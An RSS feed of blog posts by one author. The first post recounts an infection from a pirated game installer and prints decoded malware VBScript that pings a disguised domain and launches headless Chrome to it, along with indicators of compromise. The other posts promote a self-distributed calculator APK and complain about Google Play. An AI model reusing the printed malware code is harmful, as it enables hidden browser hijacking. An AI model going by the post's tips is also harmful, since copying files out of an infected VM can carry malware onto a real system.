<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>Forem: Origin</title>
    <description>The latest articles on Forem by Origin (@origin_empire).</description>
    <link>https://forem.com/origin_empire</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3882089%2Fc6e2d928-f8a6-4bf6-8710-a2d544ba2359.png</url>
      <title>Forem: Origin</title>
      <link>https://forem.com/origin_empire</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://forem.com/feed/origin_empire"/>
    <language>en</language>
    <item>
      <title>How I Trapped a Malware Operation from a 2003 Game (And How You Can Too)</title>
      <dc:creator>Origin</dc:creator>
      <pubDate>Sat, 23 May 2026 15:37:44 +0000</pubDate>
      <link>https://forem.com/origin_empire/how-i-trapped-a-malware-operation-from-a-2003-game-and-how-you-can-too-4mhi</link>
      <guid>https://forem.com/origin_empire/how-i-trapped-a-malware-operation-from-a-2003-game-and-how-you-can-too-4mhi</guid>
      <description>&lt;h2&gt;
  
  
  The Target: IGI 2 - Covert Strike (2003)
&lt;/h2&gt;

&lt;p&gt;I wanted to play an old game. I found it on a site called Ocean of Games.&lt;/p&gt;

&lt;p&gt;The site looked normal. Screenshots. Instructions. Comments. It looked legitimate. It was not.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;This is not a game site. It is a malware distribution network disguised as an archive.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Security analysts have confirmed:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;18 indicators of compromise&lt;/li&gt;
&lt;li&gt;11 MITRE ATT&amp;amp;CK techniques&lt;/li&gt;
&lt;li&gt;5 threat categories&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;If you download from Ocean of Games, you are not downloading a game. You are downloading a cryptominer dropper wrapped in nostalgia.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Infection
&lt;/h2&gt;

&lt;p&gt;I downloaded IGI 2. I followed their instructions: "Step 1: Disable Windows Defender."&lt;/p&gt;

&lt;p&gt;I played 4 missions. Then BSOD. Then days of recovery.&lt;br&gt;
then i had-&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Dead pen drive&lt;/li&gt;
&lt;li&gt;Crashed server&lt;/li&gt;
&lt;li&gt;Hardware failure&lt;/li&gt;
&lt;li&gt;Complete OS reinstall for malware fix&lt;/li&gt;
&lt;li&gt;Countless errors and wasted time&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The malware didn't just infect my computer. It derailed my life.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Hunting Ground: Virtual Machine
&lt;/h2&gt;

&lt;p&gt;I decided to fight back. Not with antivirus. With strategy.&lt;/p&gt;

&lt;p&gt;I set up a virtual machine (VM) — an isolated, disposable computer inside my real computer. The malware cannot escape a VM. It is a cage.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What you need:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;VirtualBox (free, open-source)&lt;/li&gt;
&lt;li&gt;A Windows ISO&lt;/li&gt;
&lt;li&gt;The infected game installer&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;What you do:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Create a VM&lt;/li&gt;
&lt;li&gt;Install Windows (no product key needed)&lt;/li&gt;
&lt;li&gt;Disable Windows Defender &lt;strong&gt;inside the VM&lt;/strong&gt; (let the malware win inside the cage)&lt;/li&gt;
&lt;li&gt;Download the game from Ocean of Games inside the VM&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Do not run the installer yet&lt;/strong&gt;&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  The Password Was '123'
&lt;/h2&gt;

&lt;p&gt;The downloaded file is a ZIP. Inside, you will find:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;File&lt;/th&gt;
&lt;th&gt;What it is&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Step 0 - AVENGERS_AIO_v2.5.0.rar&lt;/td&gt;
&lt;td&gt;Malware dropper (ignore)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Step 1 - Disable Defender.rar&lt;/td&gt;
&lt;td&gt;Disables Windows Defender (ignore)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Step 2 - Extract Setup.rar&lt;/td&gt;
&lt;td&gt;Password-protected archive (the game + malware installer)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Password.txt&lt;/td&gt;
&lt;td&gt;Contains the password: &lt;strong&gt;123&lt;/strong&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Yes. The password is 123. They didn't even try.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Execution
&lt;/h2&gt;

&lt;p&gt;Extract Step 2 - Extract Setup.rar with password 123. You will get Step 3 - Setup_Install_Game.exe.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Run this installer inside the VM.&lt;/strong&gt; It will install the game. It will also install the malware. That is fine. The VM is disposable.&lt;/p&gt;

&lt;p&gt;After installation, locate the game folder (usually &lt;code&gt;C:\IGI2_Game&lt;/code&gt;). Copy the entire folder to your real system using a shared folder or USB drive.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Then delete the VM.&lt;/strong&gt; The malware dies with it. Your real system never touched it.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Evidence (Full Technical Breakdown)
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Malware Components
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;File&lt;/th&gt;
&lt;th&gt;Purpose&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;WindowsService.exe&lt;/td&gt;
&lt;td&gt;Main payload launcher&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Windows Updates service.vbs&lt;/td&gt;
&lt;td&gt;VBScript that runs the miner&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;encode.vbs&lt;/td&gt;
&lt;td&gt;Converts VBS to VBE (encoded, harder to detect)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  Decoded VBScript (from the malware)
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;On Error Resume Next

Sub Pause(NSeconds)
    Wscript.Sleep(NSeconds*3000)
End Sub

Dim visualcpp
Set visualcpp = CreateObject("WScript.Shell")

counter = True
While counter = True
    website = "www.google.com.739471594492594.windows-display-service.com"
    checkstring = "ping -n 1 -w 300 " &amp;amp; website
    status = visualcpp.Run(checkstring, 0 , True)
    If status = 0 Then
        counter = False
    Else
        Pause(21)
    End If
Wend

returncodestatus = "1"
returncodestatus = visualcpp.run("chrome --headless --disable-gpu --remote-debugging-port=9222 http://www.google.com.739471594492594.windows-display-service.com",0,false)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  MITRE ATT&amp;amp;CK Techniques
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tactic&lt;/th&gt;
&lt;th&gt;Technique&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Execution&lt;/td&gt;
&lt;td&gt;User Execution (T1204)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Persistence&lt;/td&gt;
&lt;td&gt;Scheduled Task (T1053)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Defense Evasion&lt;/td&gt;
&lt;td&gt;Disable Windows Defender (T1562)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Discovery&lt;/td&gt;
&lt;td&gt;Process Discovery (T1057)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Impact&lt;/td&gt;
&lt;td&gt;Resource Hijacking (T1496) — cryptomining&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  Indicators of Compromise (IOCs)
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Domains:&lt;/strong&gt; &lt;code&gt;www.google.com.739471594492594.windows-display-service.com&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Files:&lt;/strong&gt; &lt;code&gt;MicrosoftRuntimeUpdate.vbe&lt;/code&gt;, &lt;code&gt;Windows Updates service.vbs&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Processes:&lt;/strong&gt; &lt;code&gt;chrome.exe&lt;/code&gt; (headless), &lt;code&gt;firefox.exe&lt;/code&gt; (headless)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Password:&lt;/strong&gt; &lt;code&gt;123&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Archive:&lt;/strong&gt; &lt;code&gt;Step 2 - Extract Setup.rar&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  How to Extract Safely (For Anyone Facing Similar Malware)
&lt;/h2&gt;

&lt;p&gt;If you are not comfortable with malware analysis, do not attempt to extract manually. But if you have the skills and patience, here is the method:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Set up a VM.&lt;/strong&gt; Use VirtualBox. It is free.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Install Windows in the VM.&lt;/strong&gt; Activate it.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Disable Windows Defender inside the VM.&lt;/strong&gt; Yes, turn it off. The malware needs to succeed inside the cage.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Download the file from the sketchy site inside the VM.&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Extract the ZIP.&lt;/strong&gt; Use 7-Zip.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Find Password.txt.&lt;/strong&gt; The password is often &lt;code&gt;123&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Extract the password-protected archive.&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Run the installer inside the VM.&lt;/strong&gt; Let the malware execute. The VM is disposable.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;After installation, copy the game folder to your real system.&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Delete the VM.&lt;/strong&gt; The malware dies.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Do not run the installer on your real system. Do not disable Windows Defender on your real system. Do not trust any file from Ocean of Games.&lt;/strong&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  The Aftermath
&lt;/h2&gt;

&lt;h2&gt;
  
  
  The malware is dead. The game is extracted. My real system is clean. Now i play the game on my real system.
&lt;/h2&gt;

&lt;h2&gt;
  
  
  What You Should Do
&lt;/h2&gt;

&lt;h3&gt;
  
  
  For Individuals
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Never disable Windows Defender.&lt;/strong&gt; Not for a game crack. Not for anything.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Use a VM&lt;/strong&gt; for sketchy downloads.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Keep backups.&lt;/strong&gt; Encrypted backups. Offline backups.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Switch to Linux.&lt;/strong&gt; It is free, and your keyboard will work.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Trust no one.&lt;/strong&gt; Not a sketchy website. Not me. Verify everything.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  For Law Enforcement &amp;amp; Cybersecurity Professionals
&lt;/h3&gt;

&lt;p&gt;The evidence is public:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Domains:&lt;/strong&gt; &lt;code&gt;oceanofgames.com&lt;/code&gt;, &lt;code&gt;www.google.com.739471594492594.windows-display-service.com&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Password:&lt;/strong&gt; &lt;code&gt;123&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;File hashes:&lt;/strong&gt; Available upon request&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This is not a sophisticated operation. It is a volume-based malware farm. But it has infected thousands of computers. It is still online. It is still distributing malware.&lt;/p&gt;

&lt;p&gt;I have filed reports with Porkbun (domain registrar) and Cloudflare. I have reported to Google Safe Browsing and Microsoft SmartScreen.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;You are holding the evidence. File the reports. Take down the site. Protect the next person who searches for IGI 2.&lt;/strong&gt;&lt;/p&gt;




&lt;p&gt;Visit my website and download my legitimate software madde by me on- &lt;a href="https://origin-inc-pvt-ltd.github.io/originempire.github.io/" rel="noopener noreferrer"&gt;https://origin-inc-pvt-ltd.github.io/originempire.github.io/&lt;/a&gt;&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>infosec</category>
      <category>security</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>I built my own software. Google Play rejected my $25 payment 50 times. So I built my own store. 1000 downloads. No Play Store. No Google. Just my own empire.</title>
      <dc:creator>Origin</dc:creator>
      <pubDate>Mon, 11 May 2026 10:01:21 +0000</pubDate>
      <link>https://forem.com/origin_empire/i-built-my-own-software-google-play-rejected-my-25-payment-50-times-so-i-built-my-own-store-cac</link>
      <guid>https://forem.com/origin_empire/i-built-my-own-software-google-play-rejected-my-25-payment-50-times-so-i-built-my-own-store-cac</guid>
      <description>&lt;h2&gt;
  
  
  The Dark Reality
&lt;/h2&gt;

&lt;p&gt;Google Play Console has no support email. No phone number. No human.&lt;/p&gt;

&lt;p&gt;When their system fails, you are alone.&lt;/p&gt;

&lt;p&gt;Millions of developers face the same wall. All blocked. All ignored. All asking the same question:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;"Why won't Google take my $25?"&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;No answer ever came.&lt;/p&gt;

&lt;p&gt;So I stopped asking. I built my own door.&lt;/p&gt;




&lt;h2&gt;
  
  
  What I Learned
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Google is optional.&lt;/li&gt;
&lt;li&gt;Gatekeepers can be bypassed.&lt;/li&gt;
&lt;li&gt;1000 users matter more than their $25.&lt;/li&gt;
&lt;li&gt;Your own store = your own rules. No 30% tax. No ban risk.&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Shame on Google
&lt;/h2&gt;

&lt;p&gt;Billions of dollars. Thousands of engineers.&lt;/p&gt;

&lt;p&gt;They couldn't process $25 from a kid.&lt;/p&gt;

&lt;p&gt;50 times. 4 months. 5 cards.&lt;/p&gt;

&lt;p&gt;They rejected my money. I rejected their monopoly.&lt;/p&gt;




&lt;h2&gt;
  
  
  Download
&lt;/h2&gt;

&lt;p&gt;1000 downloads. Growing.&lt;/p&gt;

&lt;p&gt;No Play Store. No Google. Just Origin Empire.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Download here:&lt;/strong&gt; [&lt;a href="https://origin-inc-pvt-ltd.github.io/originempire.github.io" rel="noopener noreferrer"&gt;https://origin-inc-pvt-ltd.github.io/originempire.github.io&lt;/a&gt;]&lt;/p&gt;




</description>
    </item>
    <item>
      <title>I built my own empire and crossed 1000 downloads without the monopoly of google. Google Play rejected my $25 payment 50 times.</title>
      <dc:creator>Origin</dc:creator>
      <pubDate>Wed, 06 May 2026 16:49:02 +0000</pubDate>
      <link>https://forem.com/origin_empire/i-built-my-own-empire-and-crossed-1000-downloads-without-the-monopoly-of-google-google-play-2cbb</link>
      <guid>https://forem.com/origin_empire/i-built-my-own-empire-and-crossed-1000-downloads-without-the-monopoly-of-google-google-play-2cbb</guid>
      <description>&lt;p&gt;&lt;em&gt;An open letter to Google: Your gatekeeping failed. A 14-year-old just proved you're optional.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;I'm founder of Origin Empire. I built the world's best calculator app called OriginCalc.&lt;/p&gt;

&lt;p&gt;Not a basic one. &lt;strong&gt;5 calculators. 12 converters. 160+ currencies. TTS. Dark mode. Notepad. History. No ads. No data collection. Works offline. Free forever.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;I tried to pay Google the $25 registration fee for the Play Store. &lt;strong&gt;50 times. 4 months. 5 different cards.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Declined. Every time.&lt;/p&gt;

&lt;p&gt;No reason. No support. No human.&lt;/p&gt;

&lt;p&gt;So I didn't beg. I didn't wait. &lt;strong&gt;I built my own website. Distributed my own APK. Created my own empire.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1000 downloads in a month. Without Play Store. Without ads. Without them.&lt;/strong&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  The Dark Reality Google Doesn't Want You to Know
&lt;/h2&gt;

&lt;p&gt;Google Play Console has no support email. No phone number. No chat. No human.&lt;/p&gt;

&lt;p&gt;When their system fails, you are alone.&lt;/p&gt;

&lt;p&gt;Thousands of developers face the same wall. People from India, Brazil, Nigeria, Indonesia. All blocked. All ignored. All asking the same question:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;"Why won't Google take my $25?"&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;No answer ever came.&lt;/p&gt;

&lt;p&gt;So I stopped asking. &lt;strong&gt;I built my own door.&lt;/strong&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  1000 Downloads. No Play Store. No Google. Just Me.
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;What they said&lt;/th&gt;
&lt;th&gt;What happened&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;"You need Play Store to succeed"&lt;/td&gt;
&lt;td&gt;1000 downloads without it&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;"Your app can't grow without us"&lt;/td&gt;
&lt;td&gt;Grew anyway&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;"Pay $25 or forget it"&lt;/td&gt;
&lt;td&gt;Paid 50 times. They rejected. I won anyway.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;"We're the only gate"&lt;/td&gt;
&lt;td&gt;I built my own gate&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;They wanted $25. They got nothing. I wanted to build. I built everything.&lt;/strong&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  Shame on Google
&lt;/h2&gt;

&lt;p&gt;You have billions of dollars. Thousands of engineers. Global infrastructure.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;And you couldn't process $25 from a 14-year-old. 50 times.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;You collect data on 2.5 billion users. You know where we live, what we search, who we email.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;But you couldn't verify a kid in India with 5 valid cards.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;You dance on "Don't be evil." You talk about supporting indie developers.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Then why are we begging for scraps at your gate?&lt;/strong&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  What I Learned
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Lesson&lt;/th&gt;
&lt;th&gt;Why it matters&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Gatekeepers are optional&lt;/td&gt;
&lt;td&gt;Build your own door&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Rejection is redirection&lt;/td&gt;
&lt;td&gt;They said no. I built yes.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;1000 users &amp;gt; their $25&lt;/td&gt;
&lt;td&gt;Your approval means nothing. Users mean everything.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Your own empire &amp;gt; their store&lt;/td&gt;
&lt;td&gt;No 30% tax. No policy violations. No ban risk.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;They didn't reject me. They set me free.&lt;/strong&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  Now
&lt;/h2&gt;

&lt;p&gt;1000 downloads. Growing every day.&lt;/p&gt;

&lt;p&gt;No Play Store. No Google. No middleman.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Just me. My empire. And a big middle finger to their gate.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;You can download OriginCalc here: [&lt;a href="https://origin-inc-pvt-ltd.github.io/originempire.github.io/" rel="noopener noreferrer"&gt;https://origin-inc-pvt-ltd.github.io/originempire.github.io/&lt;/a&gt;]&lt;/p&gt;

&lt;p&gt;Let's see how many downloads I get before Google fixes their payment system.&lt;/p&gt;

&lt;p&gt;I'm not waiting.&lt;/p&gt;




&lt;h2&gt;
  
  
  P.S. To Google
&lt;/h2&gt;

&lt;p&gt;You had one job: take my $25.&lt;/p&gt;

&lt;p&gt;You failed. 50 times.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Now I have 1000 users. You have nothing.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Enjoy your billions. I'll enjoy my freedom.&lt;/p&gt;




&lt;p&gt;What do you think? &lt;/p&gt;

</description>
    </item>
    <item>
      <title>I built a calculator at 14. Then Google rejected my $25 payment 50 times</title>
      <dc:creator>Origin</dc:creator>
      <pubDate>Sat, 02 May 2026 16:11:26 +0000</pubDate>
      <link>https://forem.com/origin_empire/i-built-a-calculator-at-14-then-google-rejected-my-25-payment-50-times-4kb0</link>
      <guid>https://forem.com/origin_empire/i-built-a-calculator-at-14-then-google-rejected-my-25-payment-50-times-4kb0</guid>
      <description>&lt;p&gt;I'm 14. I built a calculator app. 26,000 lines. 3 weeks. Alone.&lt;/p&gt;

&lt;p&gt;Not a basic calculator. A complete toolkit:&lt;/p&gt;

&lt;p&gt;5 calculators – Standard, Scientific, Graphing, Programmer, Date Calculation&lt;br&gt;
12 converters – Volume, Length, Weight, Temperature, Energy, Area, Speed, Time, Power, Data, Pressure, Angle&lt;br&gt;
160+ currencies – Live exchange rates&lt;br&gt;
TTS – Reads your calculations out loud&lt;br&gt;
Dark mode / Light mode&lt;br&gt;
Calculation history&lt;br&gt;
Built-in notepad&lt;br&gt;
100% free. No ads. No data collection. Works offline.&lt;/p&gt;

&lt;p&gt;Then I went to Google Play Console to pay the $25 registration fee.&lt;/p&gt;

&lt;p&gt;Google rejected the payment.&lt;/p&gt;

&lt;p&gt;Not the app. The app never even reached them. Google rejected the money.&lt;/p&gt;

&lt;p&gt;No reason. No explanation. Just "transaction declined."&lt;/p&gt;

&lt;p&gt;I tried 50 times. 4 months. 5 different cards. Different banks. All rejected.&lt;/p&gt;

&lt;p&gt;And here's the worst part: there is no one to contact. Google Play Console has no support email. No phone number. No chat. No human. Just automated error messages.&lt;/p&gt;

&lt;p&gt;So I built my own website. Launched my own app. Direct APK download.&lt;/p&gt;

&lt;p&gt;400 downloads in days. Zero criticism.&lt;/p&gt;

&lt;p&gt;No Play Store. No Google. Just me and my empire.&lt;/p&gt;

&lt;p&gt;Download here: [&lt;a href="https://origin-inc-pvt-ltd.github.io/originempire.github.io/" rel="noopener noreferrer"&gt;https://origin-inc-pvt-ltd.github.io/originempire.github.io/&lt;/a&gt;]&lt;/p&gt;

</description>
    </item>
    <item>
      <title>I built a calculator. Then Google rejected my $25 payment 50 times before I could even create an account to submit and launch it</title>
      <dc:creator>Origin</dc:creator>
      <pubDate>Sun, 26 Apr 2026 10:36:04 +0000</pubDate>
      <link>https://forem.com/origin_empire/i-built-a-calculator-then-google-rejected-my-25-payment-50-times-before-i-could-even-create-an-41gi</link>
      <guid>https://forem.com/origin_empire/i-built-a-calculator-then-google-rejected-my-25-payment-50-times-before-i-could-even-create-an-41gi</guid>
      <description>&lt;p&gt;I'm Rishi. Founder of Origin Empire.&lt;/p&gt;

&lt;p&gt;I built OriginCalc. Not a basic calculator. A complete toolkit.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;5 calculators. 12 converters. 160+ currencies. TTS. Dark mode. History. Notepad.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Free. No ads. No data collection. Works offline.&lt;/p&gt;

&lt;p&gt;After building it, I went to Google Play Console to pay the $25 registration fee and create my developer account.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Before even creating my account, I was rejected.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;50 times. 4 months. 5 different cards.&lt;/p&gt;

&lt;p&gt;No reason. No support. No human.&lt;/p&gt;

&lt;p&gt;Submitting the app for launch? That was far away. I never even got to that step.&lt;/p&gt;

&lt;p&gt;So I built my own website. Launched it myself.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;400 downloads in days. Zero criticism.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;No Play Store. No Google. Just Origin Empire.&lt;/p&gt;

&lt;p&gt;Download here: &lt;a href="https://origin-inc-pvt-ltd.github.io/originempire.github.io" rel="noopener noreferrer"&gt;https://origin-inc-pvt-ltd.github.io/originempire.github.io&lt;/a&gt;&lt;/p&gt;

</description>
      <category>android</category>
      <category>google</category>
      <category>showdev</category>
      <category>sideprojects</category>
    </item>
  </channel>
</rss>
